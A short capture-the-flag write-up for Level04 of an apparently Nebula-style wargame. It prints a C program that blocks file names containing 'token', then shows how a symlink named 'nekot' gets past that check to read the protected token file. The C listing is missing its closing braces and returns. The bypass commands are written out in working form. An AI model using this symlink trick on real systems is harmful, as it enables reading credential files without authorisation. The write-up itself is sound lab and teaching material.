In Level04 we are given the code of a program owned by flag04 user:

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char **argv, char **envp)  
  char buf[1024];
  int fd, rc;

  if(argc == 1) {
    printf("%s [file to read]\n", argv[0]);

  if(strstr(argv[1], "token") != NULL) {
    printf("You may not access '%s'\n", argv[1]);

  fd = open(argv[1], O_RDONLY);
  if(fd == -1) {
    err(EXIT_FAILURE, "Unable to open %s", argv[1]);

  rc = read(fd, buf, sizeof(buf));

  if(rc == -1) {
    err(EXIT_FAILURE, "Unable to read fd %d", fd);

  write(1, buf, rc);

The program opens a file passed as first argument if the name does not contain the token string so we cannot use it to open our target token file ... or can we?
Turns out that solving the level was as easy as creating symlink with a different name:

[email protected]:~$ /home/flag04/flag04 /home/flag04/token  
You may not access '/home/flag04/token'  
[email protected]:~$ ln -s /home/flag04/token nekot  
[email protected]:~$ /home/flag04/flag04 nekot